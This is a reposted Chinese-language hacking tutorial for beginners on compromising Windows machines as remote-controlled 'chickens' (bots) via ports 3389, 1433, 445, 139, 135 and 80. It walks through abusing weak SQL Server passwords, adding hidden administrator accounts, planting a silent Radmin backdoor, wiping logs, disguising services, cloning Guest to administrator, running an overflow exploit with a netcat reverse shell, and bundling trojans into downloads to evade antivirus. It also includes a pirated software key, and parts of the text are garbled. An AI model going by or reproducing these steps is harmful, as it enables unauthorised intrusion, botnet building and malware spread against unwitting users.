
新手抓雞方法大全
2009-09-09 01:02
抓雞很多人都會,但不一定全會,今天,我對所有方法做總結,也會介紹!
首先是端口抓雞,一般比較常用!有3389、1433、445、139、135等
3389端口抓雞
工具:WINNTAutoAttack自動攻擊器(掃漏洞);SQLTOOLS(SA空口令連接器);
RAMDIN影子3.0中文版(遠程控制程序)(RADMIN注冊碼:
08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);
(隱藏3389服務及不讓管理發現自己程序);(小
榕的擦PP程序);(開3389端口服務的);(使用被禁止的
Guest帳戶要用到的);(遠程桌面連接程序)。
一.掃到SA弱口令(自動攻擊器)
二.用SQLTOOLS連上去建一個用戶
net start telnet
開telnet服務
net ur mint mint /add
添加用戶mint密碼為
mint net localgroup administrators mint /add
將帳號mint升級為管理員
三.上傳后門程序(RADMIN服務端自解壓程序)
制作過程:
1、到Radmin安裝目錄下找到、 和r_;
2、在本地設置服務端(一定要生成);
設置密碼-->>設置連接端口(默認4489)-->>生成
3、導出注冊表HKEY_LOCAL_MACHINESYSTEMRadmin的鍵值為;
4、編寫一個批處理,并命名為;
@echo offnet stop r_rver
5、寫第二個批處理,,內容為:
@echo [url=mailto:off@]off@[/url] /
uninstall /silence@ /install /
silence@regedit /s @echo
[url=mailto:off@]off@[/url] /uninstall /
[url=mailto:silence@]silence@[/url] /install
/silence@regedit /
s @net start r_rver@del
@del @del @del
6、將 (r_改名)
壓縮成壓縮包;
7、將制作成自解壓文件;
選擇的自釋放模塊-->>高級自釋放選項
-->>常規
釋放路徑:%systemroot%system32
安裝程序:釋放后運行: 釋放前運行
-->>摸式
緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件
-->>確定-->>確定
生成完成。
四.用RADMIN客服端連接
上傳文件到c:WINNT(XP是windows):
(如果是在XP下,這個要把里面的WINNT改為Windows)
最好再上傳一個反彈后門RADMIN進入TELNET。
運行c:,重啟肉雞。
五.重啟后用遠程桌面遠程器連上去
這里就有時會出現個問題。
使用3389登陸,發現登陸用戶已滿,不用怕,我們把他踢出去。
telnet對方ip,發現需要 NTLM 身份驗證。我們在自己的電腦里建立一個帳號
mint密碼為mint身份為管理員。
找到c: 建立一個快捷方式到桌面。修改cmd的快捷
方式屬性為允許其他身份登陸。然后運行桌面上的的快捷方式。輸入帳
號mint密碼mint,telnet對方ip,直接可以登陸對方電腦了。
使用命令:
c:query ur (查看對方目前終端登陸狀況。)
運行命令:
c:logoff 1(踢出去一個管理者)
再用c:query ur檢查一便~~(這就是為什么不馬上用了)
六.連上后..在cmd下運行
c:winntlog . 自己的IP .(擦PP)
c: (刪除覆蓋查看當前在線用戶文件)
七.打SA空口令補丁
程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)
-->>Windowst身位驗證登陸
復制一下代碼:SELMIS
if exists (lect * from ects where id
= object_id(N’[dbo].[xp_cmdshell]’)
and OBJECTPROPERTY(id, N’IsExtendedProc’)
= 1) exec sp_dropextendedproc N’[dbo].[xp_cmdshell]’GO
按F5(運行),關了退出SQL Server再用SQL Server身位驗證進一次,退出(這
是為了不留下記錄)。
八.改3389端口和服務名稱
修改服務器端的端口設置,注冊表有2個地方需要修改。
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
ServerWdsrdpwdTdstcp],PortNumber值,默認是3389,選擇10進制,修
改成所希望的端口,比如1314。
第二個地方:
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
ServerWinStationsRDP-Tcp] PortNumber值,默認是3389,選擇10進制,
修改成所希望的端口,比如1314。
要重啟系統才能用新端口連。(不急..改了他的服務名再重啟系統吧)
導出3389服務的
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]
的鍵值為文件。編輯文件,替換TermService為Alerter(錯誤
警告服務..別的服務也行) 。再把第十行的"Description"="(這里是服務說明,
改為你所換的服務說明,這里改為通知所選用戶和計算機有關系統管理級警
報。)"第十一行的"DisplayName"="(這里是服務名稱,改為你所換的服務名稱,
這里改為Alerter)。保存,再導入注冊表(這里要先運行(可在CMD
下打這命令)服務管理器..把Alerter的服務先停止)。
再在CMD下
CD c:winnt
system32 copy
(這里是復制為Alerter服務文件名差不多的文件)
CD C:winnt sc 127.0.0.1 config Alerter binpath=
c:
(這里是從新定向Alerter服務文件.服務名一定要區分大小寫A要大寫)
九.注消后(注消比直接關要好些)用Radmin重啟肉雞
十.使用被禁用的帳戶[Guest]登陸,刪除自己開始建的帳號
1.使用展開注冊表到
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUrs
用法:[psu -p regedit -i pid]
Pid 的值為在任務欄空白處點右鍵-->>任務管理器--->>進程中的
后面的數值就是PID數值。
如:psu –p regedit –i 157
將Guest克成管理員權限,克成管理員權限的方法:
找到
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUrsNamesAdministrator
的類型值。
在HKEY_LOCAL_MACHINESAMSAMDomainsAccountUrs下找到這個類型值
在復制數值名為F的數值數劇覆蓋相應的Guest的類型值(找的方法一樣)。
導出Guest的配置(也就是導出
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUrsGuest和他相應的類型
值的數據),然后刪除Guest的配置。
2.查看計算機管理中帳戶列表,刷新這時候會出現錯誤[找不到帳戶](跳過這步
也行)。
3.將Guest的配置(二個REG文件導進注冊表)。
4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]。
net ur Guest ****
[修改密碼]net ur Guest /
active:yesnet ur Guest /active:no[命令行下禁用Guest]
5.實驗被禁止的帳戶Guest是否可用。
6.用Guest登陸后刪除自己建的帳號。
net ur mint /del
3389抓雞較為簡單,適合初學者
1433端口抓雞
用到工具:弱口令掃描器、X-scan、SQL綜合利用工具、一個木馬
先選擇IP段,
掃描出開放了1433端口的電腦,
然后用X-scan掃出弱口令,
用弱口令使用SQL綜合利用工具傳馬
445端口抓雞
第一步,我們需要做的是確定一臺存在445端口漏洞的主機。可以用掃描工具掃
描得到!比如SUPERSCAN這個端口掃描工具。
第二步,假設現在我們已經得到一臺存在445端口漏洞的主機,那么我們就可以
利用瑞士軍刀nc和溢出工具ms05039進行攻擊:
F:445>ms05039 目標IP 本地IP 1234
F:445> -vv -l -p 1234
成功的話,就會返回一個shell,然后就可以用我們常用的命令了。比如讓他去
下載我們的木馬或上傳一個木馬給他,然后運行,這樣得到一只肉雞的CDMSHELL
了。
139端口抓雞
需要肉雞開放139端口與IPC$共享,算是比較老的漏洞了,現在不怎么常用
net u 192.168.0.1ipc$ "" /ur:administrator
連接的命令是:
net<空格>u<空格>IP地址ipc$<空格>密碼<空格>/ur:用戶名
假設我要連接的目標IP地址是:192.168.1.11,用戶名是google,使用的密碼
是123456,那么連接對方139端口通道的格式就是這樣的:
net u 192.168.1.11ipc$ 123456 /ur:google 如果連接成功,那么
系統會提示"命令成功完成"!
空密碼是這樣的:
如果密碼是空的,那就在原先輸入密碼的地方以""代替。
開始查看權限:
查看登錄后用戶權限的方法很簡單,只要給目標系統傳個文件就可以了,如果傳
誦成功,那么一般都是系統管理員權限了,如果不成功可能就是來訪者權限或者
其他用戶組的。命令的格式是這樣的:
copy<>文件絕對路徑<>IP地址文件目標路徑
比如我要將本地C盤下的文件拷貝到192.168.1.11的D盤下:
copy c: 192.168.1.11d$
要注意"$"符,那是隱藏共享盤的表示符,如果對方的共享盤不是隱藏的,就不
需要"$"符了。如果命令執行成功,系統同樣會提示"已復制 1 個文件"
135端口抓雞
大家肯定不陌生,還是比較多人用的,教程也有很多,全自動抓的工具也很多,
就簡單介紹一下,
首先自己電腦要開放相應服務
用掃描器掃出開放了135端口的電腦
然后用NT-scan掃描弱口令
Recton進行開肉雞23端口
開完后我們就TELNET命令連接肉雞`
好了`成功拿到CMD權限``
下面我們共享它的C盤`輸入命令:net share c=c:/
接著就是啊D網絡工具包傳馬,然后就肉雞上線了!
還有80端口,其實就是掛網馬,
首先用獲得某網站webshell,然后用網馬生成器生成,掛馬
捆綁木馬抓雞
在電影等文件中捆綁木馬,然后上傳到網站上,比如迅雷的雷區,只要免殺好,
是不會報毒的!

本文發布于:2023-11-18 13:34:04,感謝您對本站的認可!
本文鏈接:http://m.newhan.cn/zhishi/a/170028564494107.html
版權聲明:本站內容均來自互聯網,僅供演示用,請勿用于商業和其他非法用途。如果侵犯了您的權益請與我們聯系,我們將在24小時內刪除。
本文word下載地址:新手抓雞方法大全.doc
本文 PDF 下載地址:新手抓雞方法大全.pdf
| 留言與評論(共有 0 條評論) |